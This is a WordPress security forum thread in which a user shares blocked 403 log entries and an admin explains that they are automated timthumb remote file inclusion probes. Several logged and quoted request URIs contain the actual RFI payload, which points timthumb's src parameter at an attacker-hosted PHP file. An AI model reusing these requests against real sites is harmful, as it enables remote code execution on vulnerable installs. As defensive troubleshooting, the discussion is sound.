Timthumb 403 errors – Timthumb hacking attempt

[WugFresh]

This is the error log I have now, I am guessing its timbthumb related.  I have updated all my timthumbs with the latest version available, I have tried whitelisting the plugins with regex wild card notation, nothing seems to work for me.  Any other suggestions?:

http: //pastebin.com/raw.php?i=RqDKrQqz
BPS PRO SECURITY / HTTP ERROR LOG
=================================
=================================

>>>>>>>>>>> 403 GET or Other Request Error Logged - May 2, 2013 - 10:41 am <<<<<<<<<<<
REMOTE_ADDR: 92.60.240.218
Host Name: 218-240-60-90.packetexchange.net
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR: 92.60.240.218
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-content/themes/responsive-child-theme//helpers/timthumb/image.php?src=http://flickr.com.finnovations.de/parola.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]

>>>>>>>>>>> 403 GET or Other Request Error Logged - May 2, 2013 - 10:41 am <<<<<<<<<<<
REMOTE_ADDR: 92.60.240.218
Host Name: 218-240-60-90.packetexchange.net
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR: 92.60.240.218
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-content/plugins/arconix-faq//timthumb.php?src=http://flickr.com.finnovations.de/parola.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]

[WugFresh]

I have checked out these resources already:

http://forum.ait-pro.com/forums/topic/plugin-firewall-read-me-first-troubleshooting/

http://wordpress.org/support/topic/installed-bullet-proof-security-gallery-images-gone

http://wordpress.org/support/topic/plugin-bulletproof-security-important-permanent-change-to-bps

http://www.ait-pro.com/aitpro-blog/3362/misc-projects/wordpress-tips-tricks-fixes/timthumb-hack-timthumb-finder-timthumb-remover-timthumb-cleaner-timthumb-exploit/

http://forum.ait-pro.com/forums/topic/security-log-security-log-403-errors/

[AITpro Admin]

This is a classic timthumb RFI hacking attempt against your website.  BPS Pro is blocking this hacking attempt against your website.

/wp-content/themes/responsive-child-theme//helpers/timthumb/image.php?src=http://flickr.com.finnovations.de/parola.php
/wp-content/plugins/arconix-faq//timthumb.php?src=http://flickr.com.finnovations.de/parola.php
/wp-content/plugins/radykal-fancy-gallery//js/timthumb.php?src=http://flickr.com.finnovations.de/parola.php

Unless of course you recognize the parola.php file and this is something that you want to be happening, which I doubt very seriously because the file would be an image file and not a php file.  Example:  imageFile.jpg and not .php.  The hacker is randomly sending timthumb RFI hacking probes at your site looking for a timthumb.php file to exploit and hack your website with.

[WugFresh]

Ahh.. Thank you. Yeah, that is definitely not intentional.  I do not recognize that parola.php.  I just downloaded it now to check it out and opened it in notepad++ and it looks very suspicious.

I really appreciate your quick response.

Now, moving forward.. since I only recently updated to BPS pro, how can I confirm this hack wasn’t already attempted against me when I was vulnerable?  I guess I should read up on RFI hacking, but I was wondering if you could steer me in the right direction to determine if some aspect of my site has already been compromised.

Also, should I do anything else to mitigate these attacks?  Should I be blocking one of the ip addresses listed?

Thanks again for your help.  Please let me know if I am being unclear about anything, or if more information would be helpful.

 

-Wug

[AITpro Admin]

Please do not change the Topic tags after I have changed them to a more appropriate tag.  Thank you.

If you were using BPS Free previously then you have nothing to worry about.  BPS Free has the same timthumb RFI Security filter as Pro.  If you did not have BPS Free installed then you can go to the Sucuri website and scan your site.  If your site was hacked you would probably know it was hacked so most likely your site is fine.

You cannot really trust IP addresses period.  Surface level tools to track hackers or check IP addresses typically do not find the true base IP.

Blocking by IP Address is a waste of time.  If you block 1 IP Address the hacker will switch to another one.  99.99% of hacking is done with automated bot programs.  They are designed to automatically switch to another IP address if an ip address is blocked.

In the recent WordPress and Joomla attacks there were over 90,000 IP addresses being used.

[WugFresh]

Thank you. Sorry about the tags, that was unintentional.  I just updated the OP with a few entries from the security log since the pastebin I posted is set to expire.  Maybe this thread will be helpful to someone else who is experiencing a similar RFI hacking attempt.

Thanks again for your quick correspondence.  BPS provides an excellent service and product.  Cheers.

 

-Wug

[AITpro Admin]

Yep, no problem.  We were both posting at the same time.  😉  We want to keep tags in the Forum as relative as possible so that search results do not return all kinds of unrelated topics, which ends up making things hard to find and defeats the whole purpose.  😉  Thanks.

[Author]

Posts